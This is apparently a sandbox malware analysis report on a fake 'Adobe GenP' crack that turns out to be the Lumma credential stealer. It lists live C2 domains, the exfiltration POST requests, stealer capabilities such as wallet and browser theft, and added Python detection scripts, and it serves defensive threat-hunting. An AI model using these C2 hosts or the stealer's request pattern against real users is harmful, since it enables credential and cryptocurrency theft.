Windows Analysis Report
Adobe GenP 5.exe

Overview

General Information

Sample name: Adobe GenP 5.exe
Analysis ID: 1580154
MD5: 9cce9d11869e1568a959515cd688f1f9
SHA1: 98e048ba68a2aa5b2640f768dea8a6c6a4eb060c
SHA256: 8a83820f2b3d79812bf39f4171d7d70d44b4d7a137c0aa1603f7e195dfc5210f
Tags: exe, user-aachum

Detection

LummaC
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign process
LummaC encrypted strings found
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc.)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file name differs from the original file name in its version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Adobe GenP 5.exe (PID: 6000 cmdline: "C:\Users\user\Desktop\Adobe GenP 5.exe" MD5: 9CCE9D11869E1568A959515CD688F1F9)
    • BitLockerToGo.exe (PID: 5448 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)
  • cleanup
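The process tree above is the most actionable host-side cue in this report: a dropper run from the user's Desktop starts the legitimate Windows binary BitLockerToGo.exe, which the signatures below describe as created suspended, written to and injected with a PE. The Python below is an added example, not part of the Joe Sandbox report: it evaluates process-creation events (Sysmon Event ID 1 field names are assumed) and flags a system binary spawned by an executable living in a user-writable directory, with an extra reason when the child is BitLockerToGo.exe and its parent is not on an assumed allow-list. The generic rule goes beyond this one sample; the allow-list, the path prefixes and the control events are assumptions made for the example.

```python
"""Process-creation hunt for the tree in this report: a Windows system binary
started by an executable living in a user-writable directory (added example)."""
import ntpath

# From the process tree above (PIDs as reported).
PARENT_IMAGE = r"C:\Users\user\Desktop\Adobe GenP 5.exe"
CHILD_IMAGE = r"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

SYSTEM_PREFIXES = ("c:\\windows\\",)
USER_WRITABLE_PREFIXES = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")
# Assumed allow-list of parents that legitimately start BitLockerToGo.exe
# (Explorer/autoplay); tune it to the environment.
EXPECTED_BITLOCKERTOGO_PARENTS = frozenset({"c:\\windows\\explorer.exe"})


def _norm(path: str) -> str:
    """Case-fold and normalize a Windows path (ntpath works on any host OS)."""
    return ntpath.normpath(path).lower()


def assess_process_creation(event: dict) -> list:
    """Return the reasons a process-creation event matches the injection-host pattern.

    `event` uses Sysmon Event ID 1 field names (Image, ParentImage, ...); the
    event schema is an assumption of this example.
    """
    image, parent = _norm(event.get("Image", "")), _norm(event.get("ParentImage", ""))
    reasons = []
    if not image.startswith(SYSTEM_PREFIXES):
        return reasons                  # only system binaries as children are of interest
    if parent.startswith(USER_WRITABLE_PREFIXES):
        reasons.append(f"{ntpath.basename(image)} spawned by {ntpath.basename(parent)} "
                       f"from user-writable path {ntpath.dirname(parent)}")
    if (ntpath.basename(image) == "bitlockertogo.exe"
            and parent not in EXPECTED_BITLOCKERTOGO_PARENTS):
        reasons.append("BitLockerToGo.exe launched by an unexpected parent "
                       "(injection host seen in this report)")
    return reasons


def hunt(events: list) -> list:
    """Return (Image, reasons) for every event with at least one reason."""
    hits = []
    for event in events:
        reasons = assess_process_creation(event)
        if reasons:
            hits.append((event["Image"], reasons))
    return hits


# First event mirrors the report's tree; the other three are constructed controls.
SAMPLE_EVENTS = [
    {"Image": CHILD_IMAGE, "ParentImage": PARENT_IMAGE, "ProcessId": 5448, "ParentProcessId": 6000},
    {"Image": CHILD_IMAGE, "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\notepad.exe", "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Users\user\AppData\Local\Temp\setup.exe"},
]

if __name__ == "__main__":
    for image, reasons in hunt(SAMPLE_EVENTS):
        print(image, reasons)
```

Only the first and last sample events produce reasons; the Explorer-launched BitLockerToGo.exe and notepad.exe controls stay silent, which is the behaviour to verify before deploying a rule like this, since BitLockerToGo.exe does have legitimate launches.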
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in the C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Extracted malware configuration: {"C2 url": ["rapeflowwj.lat", "necklacebudi.lat", "grannyejh.lat", "discokeyus.lat", "icyidentifysu.click", "energyaffai.lat", "crosshuaht.lat", "aspecteirs.lat", "sustainskelet.lat"], "Build id": "LPnhqo--iycpjnafscfz"}
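The configuration above holds the indicators most teams will act on. The Python below is an added example, not part of the Joe Sandbox report: it loads the extracted configuration, the sample hashes from General Information, and the C2 IP and JA3 hash from the Networking section of this report, then scores constructed log records. Domain matching covers subdomains and trailing dots; the IP and the JA3 hash are deliberately treated as weak signals because 104.21.29.252 is Cloudflare anycast space (ASN CLOUDFLARENETUS) and Suricata itself rates the JA3 hit severity 3. The record schema and the sample records are assumptions made for the example.

```python
"""IOC matcher built from the indicators in this report (added example)."""
import json
from typing import Optional

# Configuration exactly as the sandbox's extractor reported it above.
LUMMA_CONFIG = json.loads(
    '{"C2 url": ["rapeflowwj.lat", "necklacebudi.lat", "grannyejh.lat", '
    '"discokeyus.lat", "icyidentifysu.click", "energyaffai.lat", '
    '"crosshuaht.lat", "aspecteirs.lat", "sustainskelet.lat"], '
    '"Build id": "LPnhqo--iycpjnafscfz"}'
)
C2_DOMAINS = frozenset(d.lower().rstrip(".") for d in LUMMA_CONFIG["C2 url"])

# MD5 / SHA1 / SHA256 of the submitted file, from General Information.
SAMPLE_HASHES = frozenset({
    "9cce9d11869e1568a959515cd688f1f9",
    "98e048ba68a2aa5b2640f768dea8a6c6a4eb060c",
    "8a83820f2b3d79812bf39f4171d7d70d44b4d7a137c0aa1603f7e195dfc5210f",
})

# Network observables from the Networking section. Both are weak on their own:
# the IP is Cloudflare anycast space (ASN CLOUDFLARENETUS) shared with benign
# sites, and the JA3 hash only triggers a severity-3 "Possible Malware" rule.
C2_IP = "104.21.29.252"
JA3_HASH = "a0e9f5d64349fb13191bc781f81f42e1"

STRONG, WEAK = "strong", "weak"


def matching_c2_domain(name: str) -> Optional[str]:
    """Return the configured C2 domain that `name` equals or is a subdomain of."""
    labels = name.lower().rstrip(".").split(".")
    for i in range(len(labels) - 1):          # never test the bare TLD
        candidate = ".".join(labels[i:])
        if candidate in C2_DOMAINS:
            return candidate
    return None


def classify(record: dict) -> list:
    """Score one normalized log record; returns (confidence, reason) pairs.

    Record keys (assumed schema, all optional): dns_query, http_host, sni,
    dst_ip, dst_port, ja3, file_hash.
    """
    findings = []
    for key in ("dns_query", "http_host", "sni"):
        hit = matching_c2_domain(record[key]) if record.get(key) else None
        if hit:
            findings.append((STRONG, f"{key} matches C2 domain {hit}"))
    if record.get("file_hash", "").lower() in SAMPLE_HASHES:
        findings.append((STRONG, "file hash matches the submitted sample"))
    if record.get("dst_ip") == C2_IP and record.get("dst_port") == 443:
        findings.append((WEAK, "TLS to the IP that served the C2 during analysis"))
    if record.get("ja3", "").lower() == JA3_HASH:
        findings.append((WEAK, "JA3 client fingerprint seen in this run"))
    return findings


def triage(records: list) -> dict:
    """Bucket records: 'alert' on any strong finding, 'review' on weak ones only."""
    out = {"alert": [], "review": []}
    for rec in records:
        findings = classify(rec)
        if not findings:
            continue
        bucket = "alert" if any(c == STRONG for c, _ in findings) else "review"
        out[bucket].append({**rec, "findings": findings})
    return out


# Constructed sample records (not taken from the report's pcap).
SAMPLE_RECORDS = [
    {"dns_query": "icyidentifysu.click"},
    {"dns_query": "cdn.grannyejh.lat."},            # subdomain with trailing dot
    {"dns_query": "notgrannyejh.lat"},               # must not match
    {"sni": "www.cloudflare.com", "dst_ip": "104.21.29.252", "dst_port": 443},
    {"ja3": "a0e9f5d64349fb13191bc781f81f42e1", "dst_ip": "93.184.216.34", "dst_port": 443},
    {"file_hash": "8A83820F2B3D79812BF39F4171D7D70D44B4D7A137C0AA1603F7E195DFC5210F"},
]

if __name__ == "__main__":
    for bucket, recs in triage(SAMPLE_RECORDS).items():
        for rec in recs:
            print(bucket, rec["findings"])
```

The "review" bucket is where the Cloudflare IP and the JA3 hash land; promoting either to an automatic block would take down unrelated sites behind the same anycast address.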
Yara matches (Source | Rule | Description | Author)

sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security
00000000.00000002.2310216915.000000000AE80000.00000004.00001000.00020000.00000000.sdmp | Msfpayloads_msf_9 | Metasploit Payloads - file msf.war - contents | Florian Roth
  • 0x0:$x1: 4d5a9000030000000
00000000.00000002.2310776898.000000000B000000.00000004.00001000.00020000.00000000.sdmp | Msfpayloads_msf_9 | Metasploit Payloads - file msf.war - contents | Florian Roth
  • 0x0:$x1: 4d5a9000030000000
Process Memory Space: BitLockerToGo.exe PID: 5448 | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
Process Memory Space: BitLockerToGo.exe PID: 5448 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Process Memory Space: BitLockerToGo.exe PID: 5448 | JoeSecurity_LummaCStealer | Yara detected LummaC Stealer | Joe Security

Note on the two Msfpayloads_msf_9 hits: the only string reported, $x1 at offset 0x0, is the generic MZ/DOS header prefix (4d 5a 90 00 03 00 00 00). On its own it shows that a PE image sits in the memory of the first process (the 00000000.* dumps belong to Adobe GenP 5.exe, as the PDB-string entries further down confirm), which is consistent with the PE-injection signatures above; it is not by itself evidence of a Metasploit payload.
            No Sigma rule has matched
Suricata IDS alerts (Timestamp | SID | Severity | Classtype | Source IP:Port | Destination IP:Port | Protocol)

2024-12-24T02:56:31.907057+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5:49725 | 104.21.29.252:443 | TCP
2024-12-24T02:56:34.245323+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5:49736 | 104.21.29.252:443 | TCP
2024-12-24T02:56:36.612569+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5:49742 | 104.21.29.252:443 | TCP
2024-12-24T02:56:39.234144+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5:49748 | 104.21.29.252:443 | TCP
2024-12-24T02:56:43.540784+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5:49759 | 104.21.29.252:443 | TCP
2024-12-24T02:56:46.356781+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5:49765 | 104.21.29.252:443 | TCP
2024-12-24T02:56:48.876162+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5:49771 | 104.21.29.252:443 | TCP
2024-12-24T02:56:52.541408+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5:49781 | 104.21.29.252:443 | TCP

2024-12-24T02:56:33.011243+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5:49725 | 104.21.29.252:443 | TCP
2024-12-24T02:56:35.029159+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5:49736 | 104.21.29.252:443 | TCP
2024-12-24T02:57:00.470768+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5:49781 | 104.21.29.252:443 | TCP

2024-12-24T02:56:33.011243+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.5:49725 | 104.21.29.252:443 | TCP

2024-12-24T02:56:35.029159+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.5:49736 | 104.21.29.252:443 | TCP

2024-12-24T02:56:37.510301+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.5:49742 | 104.21.29.252:443 | TCP


            AV Detection

Avira URL Cloud: Label: malware, for the following sources:
  https://icyidentifysu.click/
  https://icyidentifysu.click/8Nr
  https://icyidentifysu.click/ck/8Nr
  https://icyidentifysu.click/nF
  https://icyidentifysu.click/YF
  https://icyidentifysu.click/piv
  https://icyidentifysu.click/pi
  https://icyidentifysu.click:443/api
  icyidentifysu.click
  https://icyidentifysu.click/api
Source: 3.2.BitLockerToGo.exe.400000.0.unpack | Malware Configuration Extractor: LummaC {"C2 url": ["rapeflowwj.lat", "necklacebudi.lat", "grannyejh.lat", "discokeyus.lat", "icyidentifysu.click", "energyaffai.lat", "crosshuaht.lat", "aspecteirs.lat", "sustainskelet.lat"], "Build id": "LPnhqo--iycpjnafscfz"}
Source: Adobe GenP 5.exe | VirusTotal: Detection: 37%
Source: Adobe GenP 5.exe | ReversingLabs: Detection: 44%
Source: Submitted sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: 00000003.00000002.2609837960.000000000043E000.00000040.00000400.00020000.00000000.sdmp | String decryptor recovered the following strings:
  rapeflowwj.lat
  crosshuaht.lat
  sustainskelet.lat
  aspecteirs.lat
  energyaffai.lat
  necklacebudi.lat
  discokeyus.lat
  grannyejh.lat
  icyidentifysu.click
  lid=%s&j=%s&ver=4.0
  TeslaBrowser/5.5
  - Screen Resoluton:
  - Physical Installed Memory:
  Workgroup: -
  LPnhqo--iycpjnafscfz
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00416D93 CryptUnprotectData
Source: Adobe GenP 5.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
Source: unknown | HTTPS traffic detected, TLS 1.2:
  104.21.29.252:443 -> 192.168.2.5:49725
  104.21.29.252:443 -> 192.168.2.5:49736
  104.21.29.252:443 -> 192.168.2.5:49742
  104.21.29.252:443 -> 192.168.2.5:49748
  104.21.29.252:443 -> 192.168.2.5:49759
  104.21.29.252:443 -> 192.168.2.5:49765
  104.21.29.252:443 -> 192.168.2.5:49771
  104.21.29.252:443 -> 192.168.2.5:49781
Source: Adobe GenP 5.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: BitLockerToGo.pdb | found in: Adobe GenP 5.exe, 00000000.00000003.2243124589.000000000B168000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: BitLockerToGo.pdbGCTL | found in: Adobe GenP 5.exe, 00000000.00000003.2243124589.000000000B168000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code functions containing 4x inlined nop sequences (function address: instruction following the nops):
  3_2_0042A03C: mov byte ptr [esi], al
  3_2_0040E2D5: mov byte ptr [eax], bl
  3_2_0040E2D5: movzx ebx, byte ptr [esp+esi+2B788957h]
  3_2_0040C37A: movzx edx, byte ptr [esp+ecx-5C2FB1A1h]
  3_2_004253A0: cmp dword ptr [esi+edx*8], 5E874B5Fh
  3_2_004253A0: mov eax, ebx
  3_2_0043C410: mov ecx, edx
  3_2_0043A55A: movzx ecx, byte ptr [ebp+eax-10h]
  3_2_0042A749: mov byte ptr [esi], cl
  3_2_0042B771: mov ecx, eax
  3_2_0042A80B: mov edx, ecx
  3_2_0042A80B: mov ecx, eax
  3_2_00439BE8: cmp dword ptr [edx+ebx*8], AF697AECh
  3_2_0043CCD0: movzx ebp, byte ptr [esp+edx-5A3E0FADh]
  3_2_0040DCA0: movzx edx, byte ptr [esp+eax+00000120h]
  3_2_00439F2D: cmp dword ptr [edi+esi*8], E1A2961Bh
  3_2_00429070: cmp byte ptr [esi+ebx], 00000000h
  3_2_0042B0DE: mov ecx, eax
  3_2_0042B0DE: movzx ecx, byte ptr [esi]
  3_2_00429E89: mov ecx, eax
  3_2_00429E89: movzx ecx, byte ptr [esi]
  3_2_00439140: movzx ebx, byte ptr [ecx+edx]
  3_2_00422154: cmp dword ptr [esi+edx*8], E5FE86B7h
  3_2_004221FE: cmp dword ptr [esi+edx*8], E5FE86B7h
  3_2_00409270: movzx eax, byte ptr [esp+ebx+06h]
  3_2_00420273: push esi
  3_2_0040B215: push A0E75166h
  3_2_0040C2DA: movzx ebp, byte ptr [esp+ecx+38h]
  3_2_004282E8: mov eax, ebx
  3_2_0041B2AA: movzx ecx, byte ptr [esp+eax+68C964F4h]
  3_2_0043A35B: mov dword ptr [esi], 97969554h
  3_2_00424330: cmp dword ptr [edi+esi*8], E785F9BAh
  3_2_004153FC: mov word ptr [eax], cx
  3_2_00421380: movzx ecx, word ptr [ebx+eax]
  3_2_00421380: movzx ebx, byte ptr [esp+ecx+06h]
  3_2_00419490: lea esi, dword ptr [eax-01h]
  3_2_004074A0: add eax, dword ptr [esp+ecx*4+24h]
  3_2_004074A0: movzx ecx, word ptr [edi+esi*4]
  3_2_004245DE: jmp eax
  3_2_0042760C: mov word ptr [eax], cx
  3_2_00438620: movzx ecx, byte ptr [esp+eax-6Ah]
  3_2_00409630: movzx ecx, byte ptr [esp+eax+181AFBA5h]
  3_2_00409630: movzx ecx, byte ptr [esp+eax-654B9280h]
  3_2_0041D6F0: mov byte ptr [ebp+00h], al
  3_2_004256A0: movzx ecx, byte ptr [esp+eax+20h]
  3_2_00432770: movzx ebx, byte ptr [edx]
  3_2_00436770: movzx eax, word ptr [ebp+00h]
  3_2_0043B720: movzx ecx, byte ptr [esp+eax-3A16D4AFh]
  3_2_0040C830: mov edi, ecx
  3_2_004298A0: movzx esi, byte ptr [esp+ecx+000003B2h]
  3_2_00405940: mov ebx, eax
  3_2_00405940: mov ebp, eax
  3_2_004029D0: movzx edx, byte ptr [ebp+00h]
  3_2_004389F0: cmp dword ptr [esi+edx*8], E5FE86B7h
  3_2_004389F0: cmp dword ptr [edi+esi*8], A2347758h
  3_2_0041CA40: mov ebx, edi
  3_2_00408A50: lea edx, dword ptr [eax+00000270h]
  3_2_00428AF0: mov ebx, dword ptr [edi+04h]
  3_2_00418BE7: movzx esi, byte ptr [esp+ecx-00000085h]
  3_2_00426B8E: cmp dword ptr [edi+esi*8], E785F9BAh
  3_2_00414C4E: cmp dword ptr [ebp+edx*8+00h], E785F9BAh
  3_2_0041AC1D: mov byte ptr [edi], cl
  3_2_0040CCC5: movzx edx, byte ptr [esp+eax+00000120h]
  3_2_00417CE5: mov word ptr [esi], cx
  3_2_00415CFC: movzx edx, byte ptr [ecx]
  3_2_00414D45: cmp dword ptr [ebp+edx*8+00h], E785F9BAh
  3_2_00427D4D: mov ecx, ebx
  3_2_00427D4D: cmp dword ptr [ebx+edi*8], E785F9BAh
  3_2_00439DD7: movzx ebx, byte ptr [esi+ecx+48EF6323h]
  3_2_00435E40: test eax, eax
  3_2_00435E40: add ecx, FFFFFFFEh
  3_2_00414D40: cmp dword ptr [ebp+edx*8+00h], E785F9BAh
  3_2_00429ECA: mov ecx, eax
  3_2_00429ECA: movzx ecx, byte ptr [esi]
  3_2_00402F40: movzx eax, byte ptr [ebp+edi+00000090h]
  3_2_00422F44: jmp ecx
  3_2_00421F0E: cmp dword ptr [ebx+esi*8], 4E935B1Fh
  3_2_00421F10: cmp dword ptr [ebx+esi*8], 4E935B1Fh
  3_2_00408FE0: mov byte ptr [edi], bl

            Networking

Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49725 -> 104.21.29.252:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49725 -> 104.21.29.252:443
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49736 -> 104.21.29.252:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49736 -> 104.21.29.252:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49742 -> 104.21.29.252:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49781 -> 104.21.29.252:443
Source: Malware configuration extractor | URLs:
  rapeflowwj.lat
  necklacebudi.lat
  grannyejh.lat
  discokeyus.lat
  icyidentifysu.click
  energyaffai.lat
  crosshuaht.lat
  aspecteirs.lat
  sustainskelet.lat
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update, on the following flows:
  192.168.2.5:49765 -> 104.21.29.252:443
  192.168.2.5:49771 -> 104.21.29.252:443
  192.168.2.5:49736 -> 104.21.29.252:443
  192.168.2.5:49742 -> 104.21.29.252:443
  192.168.2.5:49748 -> 104.21.29.252:443
  192.168.2.5:49759 -> 104.21.29.252:443
  192.168.2.5:49725 -> 104.21.29.252:443
  192.168.2.5:49781 -> 104.21.29.252:443
Source: global traffic | HTTP traffic detected: eight requests "POST /api HTTP/1.1" to Host: icyidentifysu.click, each with Connection: Keep-Alive and User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36, listed in the order reported:
  Content-Type: application/x-www-form-urlencoded | Content-Length: 8
  Content-Type: application/x-www-form-urlencoded | Content-Length: 54
  Content-Type: multipart/form-data; boundary=N3WY1YHRYDY | Content-Length: 12800
  Content-Type: multipart/form-data; boundary=J8WBJ6Q0JD8R2E | Content-Length: 15060
  Content-Type: multipart/form-data; boundary=B441WSEU0FABEAHWCE | Content-Length: 20574
  Content-Type: multipart/form-data; boundary=0OLTCBLHL669ZO1XS | Content-Length: 1251
  Content-Type: multipart/form-data; boundary=E05V38MADA0V3M1 | Content-Length: 592557
  Content-Type: application/x-www-form-urlencoded | Content-Length: 89
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: icyidentifysu.click
Source: unknown | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: icyidentifysu.click
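The request sequence above (small application/x-www-form-urlencoded POSTs to /api, then multipart/form-data uploads of growing size to the same host) is the check-in and exfiltration pattern the Lumma Suricata rules fire on. The Python below is an added example, not part of the Joe Sandbox report or of the malware: it parses raw HTTP/1.1 requests and flags a host once a check-in is followed by a multipart upload. Two caveats this report supports are built in. First, the User-Agent on the wire is a stock Chrome string although the decrypted strings contain "TeslaBrowser/5.5" (the UA the Malpedia entry names), so the detector ignores the UA entirely. Second, a genuine Chrome upload carries a boundary beginning with ----WebKitFormBoundary, whereas the boundaries observed here are bare alphanumerics, which is what the boundary pattern keys on. Request bodies were under TLS and are not in the report; the body check comes from the decrypted format string lid=%s&j=%s&ver=4.0, and the two bodies in the sample input are constructed placeholders. The request schema and the control request are assumptions made for the example.

```python
"""Detector for the Lumma check-in / exfiltration request pattern (added example)."""
import re
from collections import defaultdict
from typing import Optional

API_PATH = "/api"
# Check-in body layout recovered by the sandbox's string decryptor: lid=%s&j=%s&ver=4.0
CHECKIN_BODY_RE = re.compile(r"^lid=[^&]+&j=[^&]*&ver=\d+(\.\d+)?$")
# Bare alphanumeric boundaries as seen in the report. A real Chrome upload uses
# "----WebKitFormBoundary" + 16 characters, which this pattern rejects on purpose.
MULTIPART_RE = re.compile(r"^multipart/form-data;\s*boundary=([A-Za-z0-9]{8,})$", re.I)
# Wire UA from the report; it is stock Chrome, not "TeslaBrowser/5.5", so it is
# carried only to build realistic sample input and never used for detection.
CHROME_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
             "(KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36")


def parse_request(raw: str) -> dict:
    """Split a raw HTTP/1.1 request into method, path, lower-cased headers and body."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if line.strip():
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers, "body": body}


def classify_request(req: dict) -> Optional[str]:
    """Label one request 'checkin', 'exfil' or None."""
    if req["method"] != "POST" or req["path"] != API_PATH:
        return None
    headers = req["headers"]
    ctype = headers.get("content-type", "")
    try:
        length = int(headers.get("content-length", "0"))
    except ValueError:
        return None
    if ctype.lower().startswith("application/x-www-form-urlencoded") and length < 256:
        # Bodies sit under TLS and are absent from the report; when one is
        # available (e.g. from an inspecting proxy) it must match the decrypted format.
        if req["body"] and not CHECKIN_BODY_RE.match(req["body"].strip()):
            return None
        return "checkin"
    if MULTIPART_RE.match(ctype) and length > 0:
        return "exfil"
    return None


def detect_lumma_sessions(requests: list) -> dict:
    """Per Host, record the label sequence and flag once a check-in precedes an upload."""
    per_host = defaultdict(lambda: {"labels": [], "exfil_bytes": 0, "flag": False})
    for req in requests:
        host = req["headers"].get("host", "").lower()
        label = classify_request(req)
        if not host or label is None:
            continue
        state = per_host[host]
        state["labels"].append(label)
        if label == "exfil":
            state["exfil_bytes"] += int(req["headers"]["content-length"])
            if "checkin" in state["labels"][:-1]:
                state["flag"] = True
    return dict(per_host)


def _raw(ctype: str, length: int, body: str = "", host: str = "icyidentifysu.click") -> str:
    """Build a raw request in the header layout the sandbox recorded (constructed input)."""
    if body:
        length = len(body)
    return (f"POST /api HTTP/1.1\r\nConnection: Keep-Alive\r\nContent-Type: {ctype}\r\n"
            f"User-Agent: {CHROME_UA}\r\nContent-Length: {length}\r\nHost: {host}\r\n\r\n{body}")


# Header values are the report's; the two bodies and the last host are constructed.
SAMPLE_REQUESTS = [
    _raw("application/x-www-form-urlencoded", 8),
    _raw("application/x-www-form-urlencoded", 54, body="lid=EXAMPLE&j=EXAMPLE&ver=4.0"),
    _raw("multipart/form-data; boundary=N3WY1YHRYDY", 12800),
    _raw("multipart/form-data; boundary=E05V38MADA0V3M1", 592557),
    _raw("application/x-www-form-urlencoded", 0, body="user=a&pass=b", host="login.example.net"),
]

if __name__ == "__main__":
    parsed = [parse_request(r) for r in SAMPLE_REQUESTS]
    for host, state in detect_lumma_sessions(parsed).items():
        print(host, state)
```

Only icyidentifysu.click is reported, with two check-ins followed by two uploads totalling 605357 bytes; the ordinary login POST to the control host produces no label at all. Keying on the sequence rather than on a single request keeps small form posts to /api from firing on their own.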
Source: BitLockerToGo.exe, 00000003.00000003.2426192936.000000000591D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: BitLockerToGo.exe, 00000003.00000003.2426192936.000000000591D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: BitLockerToGo.exe, 00000003.00000003.2476797050.0000000003574000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2356694769.0000000003574000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2517419497.0000000003574000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micro
Source: BitLockerToGo.exe, 00000003.00000003.2426192936.000000000591D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: BitLockerToGo.exe, 00000003.00000003.2426192936.000000000591D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: BitLockerToGo.exe, 00000003.00000003.2426192936.000000000591D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: BitLockerToGo.exe, 00000003.00000003.2426192936.000000000591D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
